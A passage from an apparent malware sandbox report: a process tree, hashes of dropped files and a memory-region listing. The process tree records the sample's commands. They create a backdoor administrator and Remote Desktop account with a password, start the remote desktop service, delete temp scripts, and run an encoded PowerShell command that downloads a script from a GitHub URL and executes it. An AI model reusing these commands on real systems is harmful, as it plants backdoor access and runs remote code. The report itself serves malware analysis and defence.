- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc EGMft8Vp /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc EGMft8Vp /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc EGMft8Vp /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc EGMft8Vp1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc EGMft8Vp2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc EGMft8Vp3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\5679.exeMD5
3ba1d635fed88d8af279be91b7007bae
SHA162a1d59c746cdb51e699114f410749384a70cf73
SHA2563151b115c3370d5360286bfe3a053d0d543f0e5d21faa68fee167224e68d115a
SHA51283254fb484bd40740e5e0483dcc7fd8ce612033b00238494fdcdc5a5dcb3503195e0e2694edd5d848c07e2ddc61cafdb7d331afc4792ccd788837ebbce18bfeb
-
C:\Users\Admin\AppData\Local\Temp\5679.exeMD5
3ba1d635fed88d8af279be91b7007bae
SHA162a1d59c746cdb51e699114f410749384a70cf73
SHA2563151b115c3370d5360286bfe3a053d0d543f0e5d21faa68fee167224e68d115a
SHA51283254fb484bd40740e5e0483dcc7fd8ce612033b00238494fdcdc5a5dcb3503195e0e2694edd5d848c07e2ddc61cafdb7d331afc4792ccd788837ebbce18bfeb
-
C:\Users\Admin\AppData\Local\Temp\7A4D.exeMD5
f80418f12c03a56ac2e8d8b189c13750
SHA1cd0b728375e4e178b50bca8ad65ce79aede30d37
SHA256cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
SHA512e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
-
C:\Users\Admin\AppData\Local\Temp\7A4D.exeMD5
f80418f12c03a56ac2e8d8b189c13750
SHA1cd0b728375e4e178b50bca8ad65ce79aede30d37
SHA256cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
SHA512e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
-
C:\Users\Admin\AppData\Local\Temp\C91A.exeMD5
5dec7029dda901f99d02a1cb08d6b3ab
SHA18561c81e8fab7889eb13ab29450bed82878e78c9
SHA2566a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b
SHA51209e5856113a7b073568e878d1de74c834e318dd05b95afe8729a3008b4cc1efc0b1a6a9c21b25c0b1dadec3d6de5b5bc4ef84523f454591717b6f24fe5dffaca
-
C:\Users\Admin\AppData\Local\Temp\C91A.exeMD5
5dec7029dda901f99d02a1cb08d6b3ab
SHA18561c81e8fab7889eb13ab29450bed82878e78c9
SHA2566a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b
SHA51209e5856113a7b073568e878d1de74c834e318dd05b95afe8729a3008b4cc1efc0b1a6a9c21b25c0b1dadec3d6de5b5bc4ef84523f454591717b6f24fe5dffaca
-
C:\Users\Admin\AppData\Local\Temp\RESDED3.tmpMD5
8bdbfbeae52a07a162db6438fed5db08
SHA10fa9a30648003b469c700ed13cb670db9078231e
SHA256f6a672e74e3ffa95ae3eaf31c9e282012f7c268efc6403a44dfd64fd7d0f8054
SHA512d979182a07afef224b1a75ad43e9a7f168e9094f6b2f3becca54712b24548544ffc87ff8ea7f6cf91a2680f3b014fe975f6ca5a00073991052f4912ec94ec037
-
C:\Users\Admin\AppData\Local\Temp\RESE3F3.tmpMD5
98787bffe6393ecade3ab1b122bf567c
SHA14431c05454674c16de38273385f6d6751aca746b
SHA256762445d6296a195be10d40f81f5a4f83b43e824ae749c50fe69ea56759ca6df4
SHA5121ba2d405769b28c38f8eb3a77a81b18bc80a4247ed07e2bb0ecbc75a0f1e26ea4c298c0a3358953aec3c0c52f5a016b886a3ed093393af9e95437fe7eb7ecfe7
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
854b2dfc0a28f2959b1d2fc363a4e318
SHA1ce1753052c5bdad56708ec75d8085b2c597df6c1
SHA2567135370ad5c4279486173fa5d0de73ea06dd814e4f8df98f80624f6f8b8c231c
SHA512b0204091d6f89877c808c2c1db97c3723f063eace68d54b25da674b5971d0a2f7d60549923097c36dedc8c1cb2f77dfdd1dfb4df60f16682652a6755e287bfd6
-
C:\Users\Admin\AppData\Local\Temp\lr4k5ras\lr4k5ras.dllMD5
1f8abd49d0883f82f044707d233b14a6
SHA18cfd91bb88f388c66624f99d452dd5ba78f07235
SHA25619af6fdf329d3f0b2ff7e3039f28f06e9d871211584e81abb1f57243855079ab
SHA51278b2aeee591b1491647503035c824a4b0561222cea7769d71436a47e8301f0d8f003a48b2cbf3127a1794406c4acd07ba1b3f2156109ebd6210f66829cdf8c80
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Local\Temp\xqe10l4e\xqe10l4e.dllMD5
e1886dff2aff3470996d1ceb2c30a1ba
SHA19aee59a8f5279d7afd650596a1e94629bd444070
SHA256431e4cfb749dd94b3272d122c2859231d92d32018c0da68482641330a5d6f955
SHA5121fa33c581a8e96ff0b5e718b083980047f0c5b6ef0d72410eafe425830348a62da8f951a12edf647abb711ead61e87806448821e255a36df5706930d42c29014
-
\??\c:\Users\Admin\AppData\Local\Temp\lr4k5ras\CSC5C40ACA4BE2147D9BD68D9DAF850F52C.TMPMD5
653eb2e95ee11a3e67270f9acc623e98
SHA1583c1fc113e7bdbcac362ac7812e720520a97786
SHA2568b96d3dc6303bb22bee77f84d1abb7ab2e47fbb32408906beeae97a8381a6994
SHA51259e94ffe530e70d10c065d5d57253f3f7bdbdbd623dc1055ff43dc30c7b16d82e77248775897cda143ee1e637f6c5280fe7b97916ffe9f698327dec0ac3ee405
-
\??\c:\Users\Admin\AppData\Local\Temp\lr4k5ras\lr4k5ras.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\lr4k5ras\lr4k5ras.cmdlineMD5
499d01a7c000047de4bf7663ee66550a
SHA1bded54ea6f58cd6f47d9b889dddf97d352a5a5d9
SHA25633ff97ee29832d351ded8f496058e41ab595eb2bc91c1223db79ea008c3fd603
SHA512bc6222b27fb62139d2567c11a0004d153fd07d7b29a20cdfe86e140909b31482b7f144763e81e91def6d8818fc126d8585742894a401efb865b77024c7e3a752
-
\??\c:\Users\Admin\AppData\Local\Temp\xqe10l4e\CSC3BEEE61E154A1387A84C6526928EB.TMPMD5
905151f48a29b93683f4af04675a205b
SHA18b8e4a1e4a843aa2150ae27393957e1e8ee14676
SHA256f82e13946612acf34b0e6281e91c0f9ef74997af796bf44431036c38c0ae2c45
SHA512ede30c5ddebffc6b82440edff19f646f8aba9d79d650023669b9add045a51c38e03d9442a9db4e218bf7612930ed0145895186bcee537973a5981d4143976f97
-
\??\c:\Users\Admin\AppData\Local\Temp\xqe10l4e\xqe10l4e.0.csMD5
e0f116150ceec4ea8bb954d973e3b649
SHA186a8e81c70f4cc265f13e8760cf8888a6996f0fd
SHA256511ea5f70cbc2f5d875f7dd035cb5203b119e22c3b131cc551d21d151c909d54
SHA51232f01c2658c0314709e5dedec9a6d9911d0a0d777f6856569e043f705d036ab10e996732303ecdffea912e783b79463bdc0ffaa4b8c9d7a1e06a9073cd263bec
-
\??\c:\Users\Admin\AppData\Local\Temp\xqe10l4e\xqe10l4e.cmdlineMD5
920a27fc14cbb94cba84103ca634dfaf
SHA15f11d42706239514896bb74f47a54aeaf339de6d
SHA2566d77f57e3df70853c8da45a1a6d0912b7e293084ca9e3f4b6f41d1de5bda1cca
SHA512ac244105e21df5bdb157be4a6e6da0ec9648896b7d063323595342707be5828acd571f2f9241812dc4e3c57a11e52fc89d457fe295081871b32a1f08cd2c40a1
-
\Windows\Branding\mediasrv.pngMD5
83bd2c45f1faf20a77579cbb8765c2b3
SHA1fe01b295c1005f4cbc0cfcb277dac5e7c443622c
SHA256ca7ce804ab35bf65eb6f6e1501afbd506520bbe9bd04710d5efe0e57377a9809
SHA512e0ac8e2d79841e18fedfed993d6e0bedb169a2ca57092292ac831667dedddbca8b90619f977d449d9595adbb9efd48487940fced5eaa38ef17366ec7075da57c
-
\Windows\Branding\mediasvc.pngMD5
af4e893deae35128088534aea49a1b74
SHA1ce25e8e738978a2106e3464a7a4bf0345e60fd31
SHA25676dd1fb220473c4167a73d7202943fda2109da475e515f4056a03bb01318f22d
SHA5123115d385ec08548337b28b6b4f773578e9548d418b30f1f276f6a835a203ef497f0d23a7282f2fc7aceda73099eb4c4535c17c4842b542bd1867320f07319b97
-
memory/224-444-0x000001BC69296000-0x000001BC69298000-memory.dmpFilesize
8KB
-
memory/224-495-0x000001BC69298000-0x000001BC69299000-memory.dmpFilesize
4KB
-
memory/224-442-0x000001BC69290000-0x000001BC69292000-memory.dmpFilesize
8KB
-
memory/224-425-0x0000000000000000-mapping.dmp
-
memory/224-443-0x000001BC69293000-0x000001BC69295000-memory.dmpFilesize
8KB
-
memory/396-117-0x0000000000B00000-0x0000000000B16000-memory.dmpFilesize
88KB
-
memory/408-412-0x0000000000000000-mapping.dmp
-
memory/960-517-0x0000000000000000-mapping.dmp
-
memory/1180-401-0x0000000000000000-mapping.dmp
-
memory/1392-518-0x0000000000000000-mapping.dmp
-
memory/1500-413-0x0000000000000000-mapping.dmp
-
memory/1504-167-0x0000022519F00000-0x0000022519F01000-memory.dmpFilesize
4KB
-
memory/1504-162-0x0000022501450000-0x0000022501452000-memory.dmpFilesize
8KB
-
memory/1504-186-0x0000022519776000-0x0000022519778000-memory.dmpFilesize
8KB
-
memory/1504-207-0x0000022519778000-0x0000022519779000-memory.dmpFilesize
4KB
-
memory/1504-200-0x000002251A790000-0x000002251A791000-memory.dmpFilesize
4KB
-
memory/1504-158-0x0000000000000000-mapping.dmp
-
memory/1504-159-0x0000022501450000-0x0000022501452000-memory.dmpFilesize
8KB
-
memory/1504-160-0x0000022501450000-0x0000022501452000-memory.dmpFilesize
8KB
-
memory/1504-161-0x0000022501450000-0x0000022501452000-memory.dmpFilesize
8KB
-
memory/1504-184-0x00000225198B0000-0x00000225198B1000-memory.dmpFilesize
4KB
-
memory/1504-163-0x0000022519740000-0x0000022519741000-memory.dmpFilesize
4KB
-
memory/1504-164-0x0000022501450000-0x0000022501452000-memory.dmpFilesize
8KB
-
memory/1504-165-0x0000022501450000-0x0000022501452000-memory.dmpFilesize
8KB
-
memory/1504-166-0x0000022501450000-0x0000022501452000-memory.dmpFilesize
8KB
-
memory/1504-194-0x00000225198F0000-0x00000225198F1000-memory.dmpFilesize
4KB
-
memory/1504-168-0x0000022519770000-0x0000022519772000-memory.dmpFilesize
8KB
-
memory/1504-169-0x0000022519773000-0x0000022519775000-memory.dmpFilesize
8KB
-
memory/1504-170-0x0000022501450000-0x0000022501452000-memory.dmpFilesize
8KB
-
memory/1504-199-0x000002251A400000-0x000002251A401000-memory.dmpFilesize
4KB
-
memory/1992-358-0x0000000000000000-mapping.dmp
-
memory/2136-154-0x000002253EA70000-0x000002253EA72000-memory.dmpFilesize
8KB
-
memory/2136-152-0x0000022558F60000-0x000002255922F000-memory.dmpFilesize
2.8MB
-
memory/2136-149-0x0000000000000000-mapping.dmp
-
memory/2136-157-0x000002253EA76000-0x000002253EA77000-memory.dmpFilesize
4KB
-
memory/2136-155-0x000002253EA73000-0x000002253EA75000-memory.dmpFilesize
8KB
-
memory/2136-156-0x000002253EA75000-0x000002253EA76000-memory.dmpFilesize
4KB
-
memory/2312-421-0x0000000000000000-mapping.dmp
-
memory/2440-333-0x000001C7EFEB0000-0x000001C7EFEB2000-memory.dmpFilesize
8KB
-
memory/2440-336-0x000001C7EFEB6000-0x000001C7EFEB8000-memory.dmpFilesize
8KB
-
memory/2440-334-0x000001C7EFEB3000-0x000001C7EFEB5000-memory.dmpFilesize
8KB
-
memory/2440-348-0x000001C7EFEB8000-0x000001C7EFEBA000-memory.dmpFilesize
8KB
-
memory/2440-298-0x0000000000000000-mapping.dmp
-
memory/2480-414-0x0000000000000000-mapping.dmp
-
memory/2656-415-0x0000000000000000-mapping.dmp
-
memory/2688-416-0x0000000000000000-mapping.dmp
-
memory/2708-177-0x0000000000000000-mapping.dmp
-
memory/2760-180-0x0000000000000000-mapping.dmp
-
memory/2820-396-0x0000000000000000-mapping.dmp
-
memory/2912-417-0x0000000000000000-mapping.dmp
-
memory/2932-418-0x0000000000000000-mapping.dmp
-
memory/2984-357-0x0000000000000000-mapping.dmp
-
memory/3140-190-0x0000000000000000-mapping.dmp
-
memory/3204-400-0x0000000000000000-mapping.dmp
-
memory/3312-410-0x0000000000000000-mapping.dmp
-
memory/3380-116-0x0000000000400000-0x0000000000828000-memory.dmpFilesize
4.2MB
-
memory/3380-114-0x0000000000030000-0x0000000000038000-memory.dmpFilesize
32KB
-
memory/3380-115-0x00000000001C0000-0x00000000001C9000-memory.dmpFilesize
36KB
-
memory/3440-397-0x0000000000000000-mapping.dmp
-
memory/3580-187-0x0000000000000000-mapping.dmp
-
memory/3712-359-0x0000000000000000-mapping.dmp
-
memory/3808-411-0x0000000000000000-mapping.dmp
-
memory/4232-404-0x0000000000000000-mapping.dmp
-
memory/4260-403-0x0000000000000000-mapping.dmp
-
memory/4280-405-0x0000000000000000-mapping.dmp
-
memory/4308-129-0x0000000000000000-mapping.dmp
-
memory/4308-145-0x0000000074920000-0x0000000075C68000-memory.dmpFilesize
19.3MB
-
memory/4308-148-0x0000000005060000-0x0000000005061000-memory.dmpFilesize
4KB
-
memory/4308-144-0x0000000074090000-0x0000000074614000-memory.dmpFilesize
5.5MB
-
memory/4308-139-0x00000000010A0000-0x00000000010E5000-memory.dmpFilesize
276KB
-
memory/4308-138-0x0000000072260000-0x00000000722E0000-memory.dmpFilesize
512KB
-
memory/4308-136-0x00000000011F0000-0x00000000011F1000-memory.dmpFilesize
4KB
-
memory/4308-135-0x0000000076570000-0x0000000076661000-memory.dmpFilesize
964KB
-
memory/4308-147-0x00000000704B0000-0x00000000704FB000-memory.dmpFilesize
300KB
-
memory/4308-133-0x00000000005E0000-0x00000000005E1000-memory.dmpFilesize
4KB
-
memory/4308-134-0x00000000761D0000-0x0000000076392000-memory.dmpFilesize
1.8MB
-
memory/4308-132-0x00000000011F0000-0x000000000125C000-memory.dmpFilesize
432KB
-
memory/4316-402-0x0000000000000000-mapping.dmp
-
memory/4384-118-0x0000000000000000-mapping.dmp
-
memory/4384-121-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/4384-123-0x0000000004F60000-0x0000000004F61000-memory.dmpFilesize
4KB
-
memory/4384-124-0x00000000049E0000-0x00000000049E1000-memory.dmpFilesize
4KB
-
memory/4384-125-0x0000000004B10000-0x0000000004B11000-memory.dmpFilesize
4KB
-
memory/4384-126-0x0000000004A50000-0x0000000004A51000-memory.dmpFilesize
4KB
-
memory/4384-127-0x0000000004A90000-0x0000000004A91000-memory.dmpFilesize
4KB
-
memory/4384-128-0x0000000004950000-0x0000000004F56000-memory.dmpFilesize
6.0MB
-
memory/4404-407-0x0000000000000000-mapping.dmp
-
memory/4428-406-0x0000000000000000-mapping.dmp
-
memory/4580-422-0x0000000000000000-mapping.dmp
-
memory/4684-423-0x0000000000000000-mapping.dmp
-
memory/4764-419-0x0000000000000000-mapping.dmp
-
memory/4844-219-0x0000026CD3973000-0x0000026CD3975000-memory.dmpFilesize
8KB
-
memory/4844-210-0x0000026CB9A70000-0x0000026CB9A72000-memory.dmpFilesize
8KB
-
memory/4844-208-0x0000000000000000-mapping.dmp
-
memory/4844-214-0x0000026CB9A70000-0x0000026CB9A72000-memory.dmpFilesize
8KB
-
memory/4844-218-0x0000026CD3970000-0x0000026CD3972000-memory.dmpFilesize
8KB
-
memory/4844-220-0x0000026CB9A70000-0x0000026CB9A72000-memory.dmpFilesize
8KB
-
memory/4844-225-0x0000026CD3976000-0x0000026CD3978000-memory.dmpFilesize
8KB
-
memory/4844-209-0x0000026CB9A70000-0x0000026CB9A72000-memory.dmpFilesize
8KB
-
memory/4844-211-0x0000026CB9A70000-0x0000026CB9A72000-memory.dmpFilesize
8KB
-
memory/4844-256-0x0000026CD3978000-0x0000026CD397A000-memory.dmpFilesize
8KB
-
memory/4844-216-0x0000026CB9A70000-0x0000026CB9A72000-memory.dmpFilesize
8KB
-
memory/4844-215-0x0000026CB9A70000-0x0000026CB9A72000-memory.dmpFilesize
8KB
-
memory/4844-212-0x0000026CB9A70000-0x0000026CB9A72000-memory.dmpFilesize
8KB
-
memory/4964-420-0x0000000000000000-mapping.dmp
-
memory/5076-424-0x0000000000000000-mapping.dmp
-
memory/5088-267-0x000001A5BA263000-0x000001A5BA265000-memory.dmpFilesize
8KB
-
memory/5088-266-0x000001A5BA260000-0x000001A5BA262000-memory.dmpFilesize
8KB
-
memory/5088-253-0x0000000000000000-mapping.dmp
-
memory/5088-289-0x000001A5BA266000-0x000001A5BA268000-memory.dmpFilesize
8KB